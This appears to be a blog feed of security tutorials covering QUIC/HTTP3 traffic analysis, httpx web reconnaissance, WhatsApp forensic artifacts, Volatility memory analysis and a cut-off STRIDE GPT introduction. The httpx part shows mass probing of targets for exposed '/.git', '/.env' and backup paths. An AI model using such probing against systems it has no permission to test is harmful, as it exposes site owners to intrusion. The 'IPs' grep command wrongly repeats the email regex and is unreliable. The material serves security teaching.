Normal view

There are new articles available, click to refresh the page.
Yesterday — 5 December 2025Hackers Arise

Network Security: Get Started with QUIC and HTTP/3

5 December 2025 at 09:53

Welcome back, aspiring cyberwarriors!

For decades, traditional HTTP traffic over TCP, also known as HTTP/1 and HTTP/2, has been the backbone of the web, and we have tools to analyze, intercept, and exploit it. But nowadays, we have HTTP/3, which is steadily increasing adoption across the web. In 2022, around 22% of all websites used HTTP/3; in 2025, this number increased to ~40%. And as cyberwarriors, we need to stay ahead of these changes.

In the article, we briefly explore what’s under the hood of HTTP/3 and how we can get in touch with it. Let’s get rolling!

What is HTTP/3?

HTTP/3 is the newest evolution of the Hypertext Transfer Protocol—the system that lets browsers, applications, and APIs move data across the Internet. What sets it apart is its break from TCP, the long-standing transport protocol that has powered the web since its earliest days.

TCP (Transmission Control Protocol) is reliable but inflexible. It was built for accuracy, not speed, ensuring that all data arrives in perfect order, even if that slows the entire connection. Each session requires a multi-step handshake, and if one packet gets delayed, everything behind it must wait. That might have been acceptable for email, but it’s a poor fit for modern, high-speed web traffic.

To overcome these limitations, HTTP/3 uses QUIC (Quick UDP Internet Connections), a transport protocol built on UDP and engineered for a fast, mobile, and latency-sensitive Internet. QUIC minimizes handshake overhead, avoids head-of-line blocking, and encrypts nearly the entire connection by default—right from the start.

After years of development, the IETF officially standardized HTTP/3 in 2022. Today, it’s widely implemented across major browsers, cloud platforms, and an ever-growing number of web servers.

What Is QUIC?

Traditional web traffic follows a predictable pattern. A client initiates a TCP three-way handshake, then performs a TLS handshake on top of that connection, and finally begins sending HTTP requests. QUIC collapses this entire process into a single handshake that combines transport and cryptographic negotiation. The first time a client connects to a server, it can establish a secure connection in just one round trip. On subsequent connections, QUIC can achieve zero round-trip time resumption, meaning the client can send encrypted application data in the very first packet.

The protocol encrypts almost everything except a minimal connection identifier. Unlike TLS over TCP, where we can see TCP headers, sequence numbers, and acknowledgments in plaintext, QUIC encrypts packet numbers, acknowledgments, and even connection close frames. This encryption-by-default approach significantly reduces the metadata available for traffic analysis.

QUIC also implements connection migration, which allows a connection to survive network changes. If a user switches from WiFi to cellular, or their IP address changes due to DHCP renewal, the QUIC connection persists using connection IDs rather than the traditional four-tuple of source IP, source port, destination IP, and destination port.

QUIC Handshake

The process begins when the client sends its Initial packet. This first message contains the client’s supported QUIC versions, the available cipher suites, a freshly generated random number, and a Connection ID — a randomly chosen identifier that remains stable even if the client’s IP address changes. Inside this Initial packet, the client embeds the TLS 1.3 ClientHello message along with QUIC transport parameters and the initial cryptographic material required to start key negotiation. If the client has connected to the server before, it may even include early application data, such as an HTTP request, to save an extra round trip.

The server then responds with its own set of information. It chooses one of the client’s QUIC versions and cipher suites, provides its own random number, and supplies a server-side Connection ID along with its QUIC transport parameters. Embedded inside this response is the TLS 1.3 ServerHello, which contains the cryptographic material needed to derive shared keys. The server also sends its full certificate chain — the server certificate as well as the intermediate certificate authorities (CAs) that signed it — and may optionally include early HTTP response data.

Once the client receives the server’s response, it begins the certificate verification process. It extracts the certificate data and the accompanying signature, identifies the issuing CA, and uses the appropriate root certificate from its trust store to verify the intermediate certificates and, ultimately, the server’s certificate. To do this, it hashes the received certificate data using the algorithm specified in the certificate, then checks whether this computed hash matches the one that can be verified using the CA’s public key. If the values match and the certificate is valid for the current time period and the domain name in use, the client can trust that the server is genuine. At this point, using the TLS key schedule, the client derives the QUIC connection keys and sends its TLS Finished message inside another QUIC packet. With this exchange completed, the connection is fully ready for encrypted application data.

From this moment onward, all traffic between the client and server is encrypted using the established session keys. Unlike traditional TCP combined with TLS, QUIC doesn’t require a separate TLS handshake phase. Instead, TLS is tightly integrated into QUIC’s own handshake, allowing the protocol to eliminate extra round-trips. One of the major advantages of this design is that both the server and client can include actual application data — such as HTTP requests and responses — within the handshake itself. As a result, certificate validation and connection establishment occur in parallel with the initial exchange of real data, making QUIC both faster and more efficient than the older TCP+TLS model.

How Does QUIC Network Work?

The image below shows the basic structure of a QUIC-based network. As illustrated, HTTP/3 requests, responses, and other application data all travel through QUIC streams. These streams are encapsulated in several logical layers before being transmitted over the network.

Anatomy of a QUIC stream:

A UDP datagram serves as the outer transport container. It contains a header with the source and destination ports, along with length and checksum information, and carries one or more QUIC packets. This is the fundamental unit transmitted between the client and server across the network.

A QUIC packet is the unit contained within a UDP datagram, and each datagram may carry one or more of them. Every QUIC packet consists of a QUIC header along with one or more QUIC frames.

The QUIC header contains metadata about the packet and comes in two formats. The long header is used during connection setup, while the short header is used once the connection is established. The short header includes the connection ID, packet number, and key phase, which indicates the encryption keys in use and supports key rotation. Packet numbers increase continuously for each connection and key phase.

A frame is the smallest structured unit inside a QUIC packet. It contains the frame type, stream ID, offset, and a segment of the stream’s data. Although the data for a stream is spread across multiple frames, it can be reassembled in the correct order using the connection ID, stream ID, and offset.

A stream is a unidirectional or bidirectional channel of data within a QUIC connection. Each QUIC connection can support multiple independent streams, each identified by its own ID. If a QUIC packet is lost, only the streams carried in that packet are affected, while all other streams continue uninterrupted. This independence is what eliminates the head-of-line blocking seen in HTTP/2. Streams can be created by either endpoint and can operate in both directions.

HTTP/3 vs. HTTP/2 vs. HTTP/1: What Actually Changed?

To understand the significance of HTTP/3, it helps to first consider the limitations of its predecessors.

HTTP/1.1, the original protocol still used by millions of websites, handles only one request per TCP connection. This forces browsers to open and close multiple connections just to load a single page, resulting in inefficiency, slower performance, and high sensitivity to network issues.

HTTP/2 introduced major improvements, including multiplexing, which allows multiple requests to share a single TCP connection, as well as header compression and server push. These changes provided significant gains, but the protocol still relies on TCP, which has a fundamental limitation: if one packet is delayed, the entire connection pipeline stalls. This phenomenon, known as head-of-line blocking, cannot be avoided in HTTP/2.

HTTP/3 addresses this limitation by replacing TCP with a more advanced transport layer. Built on QUIC, HTTP/3 establishes encrypted sessions faster, typically requiring only one round-trip instead of three or more. It eliminates head-of-line blocking by giving each stream independent flow control, allowing other streams to continue even if one packet is lost. It can maintain sessions through IP or network changes, recover more gracefully from packet loss, and even support custom congestion control tailored to different workloads.

In short, HTTP/3 is not merely a refined version of HTTP/2. It is a fundamentally redesigned protocol, created to overcome the limitations of previous generations, particularly for mobile users, latency-sensitive applications, and globally distributed traffic.

Get Started with HTTP/3

Modern versions of curl (7.66.0 and later with HTTP/3 support compiled in) can test whether a target supports QUIC and HTTP/3. Here’s how to probe a server:

kali> curl –http3 -I https://www.example.com

This command attempts to connect using HTTP/3 over QUIC, but will fall back to HTTP/2 or HTTP/1.1 if QUIC isn’t supported.

Besides that, it’s also useful to see how QUIC traffic looks “in the wild.” One of the easiest ways to do this is by using Wireshark, a popular tool for analyzing network packets. Even though QUIC encrypts most of its payload, Wireshark can still identify QUIC packet types, versions, and some metadata, which helps us understand how a QUIC connection is established.

To start, open Wireshark and visit a website that supports QUIC. Cloudflare is a good example because it widely deploys HTTP/3 and the QUIC protocol. QUIC typically runs over UDP port 443, so the simplest filter to confirm that you are seeing QUIC traffic is:

udp.port == 443

This filter shows all UDP traffic on port 443, which almost always corresponds to QUIC when dealing with modern websites.

QUIC uses different packet types during different stages of the connection. Even though the content is encrypted, Wireshark can still distinguish these packet types.

To show only Initial packets, which are the very first packets exchanged when a client starts a QUIC connection, use:

quic.long.packet_type == 0

Initial packets are part of QUIC’s handshake phase. They are somewhat similar to the “ClientHello” and “ServerHello” messages in TLS, except QUIC embeds the handshake inside the protocol itself.

If you want to view Handshake packets, which continue the cryptographic handshake after the Initial packets, use:

quic.long.packet_type == 2

These packets help complete the secure connection setup before QUIC switches to encrypted “short header” packets for normal data (like HTTP/3 requests and responses).
Also, QUIC has multiple versions, and servers often support more than one. To see packets that use a specific version, try:

quic.version == 0x00000001

This corresponds to QUIC version 1, which is standardized in RFC 9000. By checking which QUIC version appears in the traffic, you can understand what the server supports and whether it is using the standardized version or an older draft version.

Summary

QUIC isn’t just an incremental upgrade — it’s a complete reimagining of how modern internet communication should work. While the traditional stack of TCP + TLS + HTTP/2 served us well for many years, it was never designed for the realities of today’s internet: global-scale latency, constantly changing mobile connections, and the growing demand for both high performance and strong security. QUIC was built from the ground up to address these challenges, making it faster, more resilient, and more secure for the modern web.

Keep coming back, aspiring cyberwarriors, as we continue to explore how fundamental protocols of the internet are being rewritten.

Before yesterdayHackers Arise

Bug Bounty: Get Started with httpx

4 December 2025 at 10:05

Welcome back, aspiring cyberwarriors!

Before we can exploit a target, we need to understand its attack surface completely. This means identifying web servers, discovering hidden endpoints, analyzing response headers, and mapping out the entire web infrastructure. Traditional tools like curl and wget are useful, but they’re slow and cumbersome when you’re dealing with hundreds or thousands of targets. You need something faster and more flexible.

Httpx is a fast and multi-purpose HTTP toolkit developed by ProjectDiscovery that allows running multiple probes using a simple command-line interface. It supports HTTP/1.1, HTTP/2, and can probe for various web technologies, response codes, title extraction, and much more.

In this article, we will explore how to install httpx, how to use it, and how to extract detailed information about a target. We will also cover advanced filtering techniques and discuss how to use this tool effectively. Let’s get rolling!

Step #1 Install Go Programming Language

Httpx is written in Go, so we need to have the Go programming language installed on our system.

To install Go on Kali Linux, use the following command:

kali > sudo apt install golang-go

Once the installation completes, verify it worked by checking the version:

kali > go version

Step #2 Install httpx Using Go

To install httpx, enter the following command:

kali > go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest

The “-v” flag enables verbose output so you can see what’s happening during the installation. The “@latest” tag ensures you’re getting the most recent stable version of httpx. This command will download the source code, compile it, and install the binary in your Go bin directory.

To make sure httpx is accessible from anywhere in your terminal, you need to add the Go bin directory to your PATH if it’s not already there. Check if it’s in your PATH by typing:

kali > echo $PATH

If you don’t see something like “/home/kali/go/bin” in the output, you’ll need to add it. Open your .bashrc or .zshrc file (depending on which shell you use) and add this line:

export PATH=$PATH:~/go/bin

Then reload your shell configuration:

kali > source ~/.bashrc

Now verify that httpx is installed correctly by checking its version:

kali > httpx -version

Step #3 Basic httpx Usage and Probing

Let’s start with some basic httpx usage to understand how the tool works. Httpx is designed to take a list of hosts and probe them to determine if they’re running web servers and extract information about them.

The simplest way to use httpx is to provide a single target directly on the command line. Let’s probe a single domain:

kali> httpx -u “example.com” -probe

This command initiates an HTTP probe on the website. This is useful for quickly checking the availability of the web page.

Now let’s try probing multiple targets at once. Create a file with several domains you want to probe.

Now run httpx against this file:

kali > httpx -l hosts.txt -probe

Step #4 Extracting Detailed Information

One of httpx’s most powerful features is its ability to extract detailed information about web servers in a single pass.

Let’s quickly identify what web server is hosting each target:

kali > httpx -l hosts.txt -server

Now let’s extract even more information using multiple flags:

kali> httpx -l hosts.txt -title -tech-detect -status-code -content-length -response-time

This command will extract the page title, detect web technologies, show the HTTP status code, display the content length, and measure the response time.

The “-tech-detect” flag is particularly valuable because it uses Wappalyzer fingerprints to identify the technologies running on each web server. This can reveal content management systems, web frameworks, and other technologies that might have known vulnerabilities.

Step #5 Advanced Filtering and Matchers

Filters in httpx allow you to exclude unwanted responses based on specific criteria, such as HTTP status codes or text content.

Let’s say you don’t want to see targets that return a 301 status code. For this purpose, the -filter-code or -fc flag exists. To see the results clearly, I’ve added the -status-code or -sc flag as well:

kali > httpx -l hosts.txt -sc -fc 301

Httpx outputs filtered results without status code 301. Besides that, you can filter “dead” or default/error responses with -filter-error-page or -fep flag.

kali> httpx -l hosts.txt -sc -fep

This flag enables “filter response with ML-based error page detection”. In other words, when you use -fep, httpx tries to detect and filter out responses that look like generic or error pages.

In addition to filters, httpx has matchers. While filters exclude unwanted responses, matchers include only the responses that meet specific criteria. Think of filters as removing noise, and matchers as focusing on exactly what you’re looking for.

For example, let’s output only responses with 200 status code using the -match-code or -mc flag:

kali> httpx -l hosts.txt -status-code -match-code 200

For more advanced filtering, you can use regex patterns to match specific content in the response (-match-regex or -mr flag):

kali> httpx -l hosts.txt -match-regex “admin|login|dashboard”

This will only show targets whose response body contains the words “admin,” “login,” or “dashboard,” helping you quickly identify administrative interfaces or login pages.

Step #6 Probing for Specific Vulnerabilities and Misconfigurations

Httpx can be used to quickly identify common vulnerabilities and misconfigurations across large numbers of targets. While it’s not a full vulnerability scanner, it can detect certain issues that indicate potential security problems.

For example, let’s probe for specific paths that might indicate vulnerabilities or interesting endpoints:

kali > httpx -l targets.txt -path “/admin,/login,/.git,/backup,/.env”

The -path flag, as the name suggests, tells httpx to probe specific paths on each target.

Another useful technique is probing for different HTTP methods:

kali > httpx -l targets.txt -sc -method -x all

In the command above, the -method flag is used to display HTTP request method, and -x all to probe all of these methods.

Summary

Traditional HTTP probing tools are too slow and limited for the kind of large-scale reconnaissance that modern bug bounty and pentesting demands. Httpx provides a fast, flexible, and powerful solution that’s specifically designed for security researchers who need to quickly analyze hundreds or thousands of web targets while extracting comprehensive information about each one.

In this article, we covered how to install httpx, basic and advanced usage examples as well as shared ideas on how httpx might be used for vulnerability detections. This tool really fast and can significantly boost your productivity whether you’re conducting bug bounty hunting or web app security testing. Check this out, maybe it will find a place in your cyberwarriors toolbox.

Mobile Forensics: Extracting Data from WhatsApp

3 December 2025 at 10:09

Welcome back, aspiring digital investigators!

Today we will take a look at WhatsApp forensics. WhatsApp is one of those apps that are both private and routine for many users. People treat chats like a private conversation, and because it feels comfortable, users often share things there that they would not say on public social networks. That’s why WhatsApp is so critical for digital forensics. The app stores conversations, media, timestamps, group membership information and metadata that can help reconstruct events, identify contacts and corroborate timelines in criminal and cyber investigations.

At Hackers-Arise we offer professional digital forensics services that support cybercrime investigations and fraud examinations. WhatsApp forensics is done to find reliable evidence. The data recovered from a device can show who communicated with whom, when messages were sent and received, what media was exchanged, and often which account owned the device. That information is used to link suspects and verify statements. It also maps movements when combined with location artifacts that investigators and prosecutors can trust.

You will see how WhatsApp keeps its data on different platforms and what those files contain.

WhatsApp Artifacts on Android Devices

On Android, WhatsApp stores most of its private application data inside the device’s user data area. In a typical layout you will find the app’s files under a path such as /data/data/com.whatsapp/ (or equivalently /data/user/0/com.whatsapp/ on many devices). Those directories are not normally accessible without elevated privileges. To read them directly you will usually need superuser (root) access on the device or a physical dump of the file system obtained through lawful and technically appropriate means. If you do not have root or a physical image, your options are restricted to logical backups or other extraction methods which may not expose the private WhatsApp databases.

whatsapp files
Source: Group-IB

Two files deserve immediate attention on Android: wa.db and msgstore.db. Both are SQLite databases and together they form the core of WhatsApp evidence.

analyzing wa.db file whatsapp
Source: Group-IB

wa.db is the contacts database. It lists the WhatsApp user’s contacts and typically contains phone numbers, display names, status strings, timestamps for when contacts were created or changed, and other registration metadata. You will usually open the file with a SQLite browser or query it with sqlite3 to inspect tables. The key tables investigators look for are the table that stores contact records (often named wa_contacts or similar), sqlite_sequence which holds auto-increment counts and gives you a sense of scale, and android_metadata which contains localization info such as the app language.

reading contact names
Source: Group-IB

Wa.db is essentially the address book for WhatsApp. It has names, numbers and a little context for each contact.

msgsore.db file whatsapp
Source: Group-IB

msgstore.db is the message store. This database contains sent and received messages, timestamps, message status, sender and receiver identifiers, and references to media files. In many WhatsApp versions you will find tables that include a general information table (often named sqlite_sequence), a full-text index table for message content (message_fts_content or similar), the main messages table which usually contains the message body and metadata, messages_thumbnails which catalogs images and their timestamps, and a chat_list table that stores conversation entries. 

Be aware that WhatsApp evolves and field names change between versions. Newer schema versions may include extra fields such as media_enc_hash, edit_version, or payment_transaction_id. Always inspect the schema before you rely on a specific field name.

finding messages on whatsapp
reading whatsapp texts
Source: Group-IB

On many Android devices WhatsApp also keeps encrypted backups in a public storage location, typically under /data/media/0/WhatsApp/Databases/ (the virtual SD card)

or /mnt/sdcard/WhatsApp/Databases/ for physical SD cards. Those backup files look like msgstore.db.cryptXX, where XX indicates the cryptographic scheme version. 

encrypted whatsapp files
Source: Group-IB

The msgstore.db.cryptXX files are an encrypted copy of msgstore.db intended for device backups. To decrypt them you need a cryptographic key that WhatsApp stores privately on the device, usually somewhere like /data/data/com.whatsapp/files/. Without that key, those encrypted backups are not readable.

Other important Android files and directories to examine include the preferences and registration XMLs in /data/data/com.whatsapp/shared_prefs/. The file com.whatsapp_preferences.xml often contains profile details and configuration values. A fragment of such a file may show the phone number associated with the account, the app version, a profile message such as “Hey there! I am using WhatsApp.” and the account display name. The registration.RegisterPhone.xml file typically contains registration metadata like the phone number and regional format. 

The axolotl.db file in /data/data/com.whatsapp/databases/ holds cryptographic keys (used in the Signal/Double Ratchet protocol implementation) and account identification data. chatsettings.db contains app settings. Logs are kept under /data/data/com.whatsapp/files/Logs/ and may include whatsapp.log as well as compressed rotated backups like whatsapp-YYYY-MM-DD.1.log.gz

These logs can reveal app activity and errors that may be useful for timing or troubleshooting analysis.

whatsapp logs
Source: Group-IB

Media is often stored in the media tree on internal or external storage:

/data/media/0/WhatsApp/Media/WhatsApp Images/ for images,

/data/media/0/WhatsApp/Media/WhatsApp Voice Notes/ for voice messages (usually Opus format), WhatsApp Audio, WhatsApp Video, and WhatsApp Profile Photos.

whatsapp data stored externally
Source: Group-IB

Within the app’s private area you may also find cached profile pictures under /data/data/com.whatsapp/cache/Profile Pictures/ and avatar thumbnails under /data/data/com.whatsapp/files/Avatars/. Some avatar thumbnails use a .j extension while actually being JPEG files. Always validate file signatures rather than trusting extensions.

If the device uses an SD card, a WhatsApp directory at the card’s root may store copies of shared files (/mnt/sdcard/WhatsApp/.Share/), a trash folder for deleted content (/mnt/sdcard/WhatsApp/.trash/), and the Databases subdirectory with encrypted backups and media subfolders mirroring those on internal storage. The presence of deleted files or .trash folders can be a fruitful source of recovered media.

A key complication on Android is manufacturer or custom-ROM behavior. Some vendors add features that change where app data is stored. For example, certain Xiaomi phones implement a “Second Space” feature that creates a second user workspace. WhatsApp in the second workspace stores its data under a different user ID path such as /data/user/10/com.whatsapp/databases/wa.db rather than the usual /data/user/0/com.whatsapp/databases/wa.db

As things evolve and change, you need to validate the actual paths on the target device rather than assuming standard locations.

WhatsApp Artifacts on iOS Devices

On iOS, WhatsApp tends to centralize its data into a few places and is commonly accessible via device backups. The main application database is often ChatStorage.sqlite located under a shared group container such as /private/var/mobile/Applications/group.net.whatsapp.WhatsApp.shared/ (some forensic tools display this as AppDomainGroup-group.net.whatsapp.WhatsApp.shared).

chatsorage.sqlite file whatsapp ios
Source: Group-IB

Within ChatStorage.sqlite the most informative tables are often ZWAMESSAGE, which stores message records, and ZWAMEDIAITEM, which stores metadata for attachments and media items. Other tables like ZWAPROFILEPUSHNAME and ZWAPROFILEPICTUREITEM map WhatsApp identifiers to display names and avatars. The table Z_PRIMARYKEY typically contains general database metadata such as record counts.

extracting texts from ios whatsapp backups
Source: Group-IB

iOS also places supporting files in the group container. BackedUpKeyValue.sqlite can contain cryptographic keys and data useful for identifying account ownership. ContactsV2.sqlite stores contact details: names, phone numbers, profile statuses and WhatsApp IDs. A simple text file like consumer_version may hold the app version and current_wallpaper.jpg (or wallpaper in older versions) contains the background image used in WhatsApp chats. The blockedcontacts.dat file lists blocked numbers, and pw.dat can hold an encrypted password. Preference plists such as net.whatsapp.WhatsApp.plist or group.net.whatsapp.WhatsApp.shared.plist store profile settings.

contact info and preferences whatsapp ios
Source: Group-IB

Media thumbnails, avatars and message media are stored under paths like /private/var/mobile/Applications/group.net.whatsapp.WhatsApp.shared/Media/Profile/ and /private/var/mobile/Applications/group.net.whatsapp.WhatsApp.shared/Message/Media/. WhatsApp logs, for example calls.log and calls.backup.log, often survive in the Documents or Library/Logs folders and can help establish call activity.

Because iOS devices are frequently backed up through iTunes or Finder, you can often extract WhatsApp artefacts from a device backup rather than needing a full file system image. If the backup is unencrypted and complete, it may include the ChatStorage.sqlite file and associated media. If the backup is encrypted you will need the backup password or legal access methods to decrypt it. In practice, many investigators create a forensic backup and then examine the WhatsApp databases with a SQLite viewer or a specialized forensic tool that understands WhatsApp schema differences across versions.

Practical Notes For Beginners

From the databases and media files described above you can recover contact lists, full or partial chat histories, timestamps in epoch format (commonly Unix epoch in milliseconds on Android), message status (sent, delivered, read), media filenames and hashes, group membership, profile names and avatars, blocked contacts, and even application logs and version metadata. It helps us understand who communicated with whom, when messages were exchanged, whether media were transferred, and which accounts were configured on the device.

For beginners, a few practical cautions are important to keep in mind. First, always operate on forensic images or copies of extracted files. Do not work directly on the live device unless you are performing an approved, controlled acquisition and you have documented every action. Second, use reliable forensic tools to open SQLite databases. If you are parsing fields manually, confirm timestamp formats and time zones. Third, encrypted backups require the device’s key to decrypt. The key is usually stored in the private application area on Android, and without it you cannot decode the .cryptXX files. Fourth, deleted chats and files are not always gone, as databases may leave records or media may remain in caches or on external storage. Yet recovery is never guaranteed and depends on many factors including the time since deletion and subsequent device activity.

When you review message tables, map the message ID fields to media references carefully. Many WhatsApp versions use separate tables for media items where the actual file is referenced by a media ID or filename. Thumbnail tables and media directories will help you reconstruct the link between a textual message and the file that accompanied it. Pay attention to the presence of additional fields in newer app versions. These may contain payment IDs, edit history or encryption metadata. Adapt your queries accordingly.

Finally, because WhatsApp and operating systems change over time, always inspect the schema and file timestamps on the specific evidence you have. Do not assume field names or paths are identical between devices or app versions. Keep a list of the paths and filenames you find so you can reproduce your process and explain it in reports.

Summary

WhatsApp forensics is a rich discipline. On Android the primary artifacts are the wa.db contacts database, the msgstore.db message store and encrypted backups such as msgstore.db.cryptXX, together with media directories, preference XMLs and cryptographic key material in the app private area. On iOS the main artifact is ChatStorage.sqlite and a few supporting files in the app group container and possibly contained in a device backup. To retrieve and interpret these artifacts you must have appropriate access to the device or an image and know where to look for the app files on the device you are examining. Also, be comfortable inspecting SQLite databases and be prepared to decrypt backups where necessary.

If this kind of work interests you and you want to understand how real mobile investigations are carried out, you can also join our three-day mobile forensics course. The training walks you through the essentials of Android and iOS, explains how evidence is stored on modern devices, and shows you how investigators extract and analyze that data during real cases. You will work with practical labs that involve hidden apps, encrypted communication, and devices that may have been rooted or tampered with. 

Learn more:

https://hackersarise.thinkific.com/courses/mobile-forensics

Digital Forensics: Volatility – Memory Analysis Guide, Part 2

1 December 2025 at 10:31

Hello, aspiring digital forensics investigators!

Welcome back to our guide on memory analysis!

In the first part, we covered the fundamentals, including processes, dumps, DLLs, handles, and services, using Volatility as our primary tool. We created this series to give you more clarity and help you build confidence in handling memory analysis cases. Digital forensics is a fascinating area of cybersecurity and earning a certification in it can open many doors for you. Once you grasp the key concepts, you’ll find it easier to navigate the field. Ultimately, it all comes down to mastering a core set of commands, along with persistence and curiosity. Governments, companies, law enforcement and federal agencies are all in need of skilled professionals  As cyberattacks become more frequent and sophisticated, often with the help of AI, opportunities for digital forensics analysts will only continue to grow.

Now, in part two, we’re building on that to explore more areas that help uncover hidden threats. We’ll look at network info to see connections, registry keys for system changes, files in memory, and some scans like malfind and Yara rules to find malware. Plus, as promised, there are bonuses at the end for quick ways to pull out extra details

Network Information

As a beginner analyst, you’d run network commands to check for sneaky connections, like if malware is phoning home to hackers. For example, imagine investigating a company’s network after a data breach, these tools could reveal a hidden link to a foreign server stealing customer info, helping you trace the attacker.

Netscan‘ scans for all network artifacts, including TCP/UDP. ‘Netstat‘ lists active connections and sockets. In Vol 2, XP/2003-specific ones like ‘connscan‘ and ‘connections‘ focus on TCP, ‘sockscan‘ and ‘sockets‘ on sockets, but they’re old and not present in Vol 3.

Volatility 2:

vol.py -f “/path/to/file” ‑‑profile <profile> netscan

vol.py -f “/path/to/file” ‑‑profile <profile> netstat

XP/2003 SPECIFIC:

vol.py -f “/path/to/file” ‑‑profile <profile> connscan

vol.py -f “/path/to/file” ‑‑profile <profile> connections

vol.py -f “/path/to/file” ‑‑profile <profile> sockscan

vol.py -f “/path/to/file” ‑‑profile <profile> sockets

Volatility 3:

vol.py -f “/path/to/file” windows.netscan

vol.py -f “/path/to/file” windows.netstat

bash$ > vol -f Windows7.vmem windows.netscan

netscan in volatility

This output shows network connections with protocols, addresses, and PIDs. Perfect for spotting unusual traffic.

bash$ > vol -f Windows7.vmem windows.netstat

netstat in volatility

Here, you’ll get a list of active sockets and states, like listening or established links.

Note, the XP/2003 specific plugins are deprecated and therefore not available in Volatility 3, although are still common in the poorly financed government sector.

Registry

Hive List

You’d use hive list commands to find registry hives in memory, which store system settings malware often tweaks these for persistence. Say you’re checking a home computer after suspicious pop-ups. This could show changes to startup keys that launch bad software every boot.

hivescan‘ scans for hive structures. ‘hivelist‘ lists them with virtual and physical addresses.

Volatility 2:

vol.py -f “/path/to/file” ‑‑profile <profile> hivescan

vol.py -f “/path/to/file” ‑‑profile <profile> hivelist

Volatility 3:

vol.py -f “/path/to/file” windows.registry.hivescan

vol.py -f “/path/to/file” windows.registry.hivelist

bash$ > vol -f Windows7.vmem windows.registry.hivelist

hivelist in volatility

This lists the registry hives with their paths and offsets for further digging.

bash$ > vol -f Windows7.vmem windows.registry.hivescan

hivescan in volatility

The scan output highlights hive locations in memory.

Printkey

Printkey is handy for viewing specific registry keys and values, like checking for malware-added entries. For instance, in a ransomware case, you might look at keys that control file associations to see if they’ve been hijacked.

Without a key, it shows defaults, while -K or –key targets a certain path.

Volatility 2:

vol.py -f “/path/to/file” ‑‑profile <profile> printkey

vol.py -f “/path/to/file” ‑‑profile <profile> printkey -K “Software\Microsoft\Windows\CurrentVersion”

Volatility 3:

vol.py -f “/path/to/file” windows.registry.printkey

vol.py -f “/path/to/file” windows.registry.printkey ‑‑key “Software\Microsoft\Windows\CurrentVersion”

bash$ > vol -f Windows7.vmem windows.registry.printkey

windows registry print key in volatility

This gives a broad view of registry keys.

bash$ > vol -f Windows7.vmem windows.registry.printkey –key “Software\Microsoft\Windows\CurrentVersion”

widows registry printkey in volatility

Here, it focuses on the specified key, showing subkeys and values.

Files

File Scan

Filescan helps list files cached in memory, even deleted ones, great for finding malware files that were run but erased from disk. This can uncover temporary files from the infection.

Both versions scan for file objects in memory pools.

Volatility 2:

vol.py -f “/path/to/file” ‑‑profile <profile> filescan

Volatility 3:

vol.py -f “/path/to/file” windows.filescan

bash$ > vol -f Windows7.vmem windows.filescan

scanning files in volatility

This output lists file paths, offsets, and access types.

File Dump

You’d dump files to extract them from memory for closer checks, like pulling a suspicious script. In a corporate espionage probe, dumping a hidden document could reveal leaked secrets.

Without options, it dumps all. With offsets or PID, it targets specific ones. Vol 3 uses virtual or physical addresses.

Volatility 2:

vol.py -f “/path/to/file” ‑‑profile <profile> dumpfiles ‑‑dump-dir=“/path/to/dir”

vol.py -f “/path/to/file” ‑‑profile <profile> dumpfiles ‑‑dump-dir=“/path/to/dir” -Q <offset>

vol.py -f “/path/to/file” ‑‑profile <profile> dumpfiles ‑‑dump-dir=“/path/to/dir” -p <PID>

Volatility 3:

vol.py -f “/path/to/file” -o “/path/to/dir” windows.dumpfiles

vol.py -f “/path/to/file” -o “/path/to/dir” windows.dumpfiles ‑‑virtaddr <offset>

vol.py -f “/path/to/file” -o “/path/to/dir” windows.dumpfiles ‑‑physaddr <offset>

bash$ > vol -f Windows7.vmem windows.dumpfiles

duping files in volatility

This pulls all cached files Windows has in RAM.

Miscellaneous

Malfind

Malfind scans for injected code in processes, flagging potential malware.

Vol 2 shows basics like hexdump. Vol 3 adds more details like protection and disassembly.

Volatility 2:

vol.py -f “/path/to/file” ‑‑profile <profile> malfind

Volatility 3:

vol.py -f “/path/to/file” windows.malfind

bash$ > vol -f Windows7.vmem windows.malfind

scanning for suspcious injections with malfind in in volatility

This highlights suspicious memory regions with details.

Yara Scan

Yara scan uses rules to hunt for malware patterns across memory. It’s like a custom detector. For example, during a widespread attack like WannaCry, a Yara rule could quickly find infected processes.

Vol 2 uses file path. Vol 3 allows inline rules, file, or kernel-wide scan.

Volatility 2:

vol.py -f “/path/to/file” yarascan -y “/path/to/file.yar”

Volatility 3:

vol.py -f “/path/to/file” windows.vadyarascan ‑‑yara-rules <string>

vol.py -f “/path/to/file” windows.vadyarascan ‑‑yara-file “/path/to/file.yar”

vol.py -f “/path/to/file” yarascan.yarascan ‑‑yara-file “/path/to/file.yar”

bash$ > vol -f Windows7.vmem windows.vadyarascan –yara-file yara_fules/Wannacrypt.yar

scanning with yara rules in volatility

As you can see we found the malware and all related processes to it with the help of the rule

Bonus

Using the strings command, you can quickly uncover additional useful details, such as IP addresses, email addresses, and remnants from PowerShell or command prompt activities.

Emails

bash$ > strings Windows7.vmem | grep -oE "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b"

viewing emails in a memory capture

IPs

bash$ > strings Windows7.vmem | grep -oE "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b"

viewing ips in a memory capture

Powershell and CMD artifacts

bash$ > strings Windows7.vmem | grep -E "(cmd|powershell|bash)[^\s]+"

viewing powershell commands in a memory capture

Summary

By now you should feel comfortable with all the network analysis, file dumps, hives and registries we had to go through. As you practice, your confidence will grow fast. The commands covered here will help you solve most of the cases as they are fundamental. Also, don’t forget that Volatility has a lot more different plugins that you may want to explore. Feel free to come back to this guide anytime you want. Part 1 will remind you how to approach a memory dump, while Part 2 has the commands you need. In this part, we’ve expanded your Volatility toolkit with network scans to track connections, registry tools to check settings, file commands to extract cached items, and miscellaneous scans like malfind for injections and Yara for pattern matching. Together they give you a solid set of steps. 

If you want to turn this into a career, our digital forensics courses are built to get you there. Many students use this training to prepare for industry certifications and job interviews. Our focus is on the practical skills that hiring teams look for.

Using Artificial Intelligence (AI) in Cybersecurity: Automate Threat Modeling with STRIDE GPT

28 November 2025 at 09:48

Welcome back, aspiring cyberwarriors!

The STRIDE methodology has been the gold standard for systematic threat identification, categorizing threats into Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. However, applying STRIDE effectively requires not just understanding these categories but also having the experience to identify how they manifest in specific application architectures.

To solve this problem, we have STRIDE GPT. By combining the analytical power of AI with the proven STRIDE methodology, this tool can generate comprehensive threat models, attack trees, and mitigation strategies in minutes rather than hours or days.

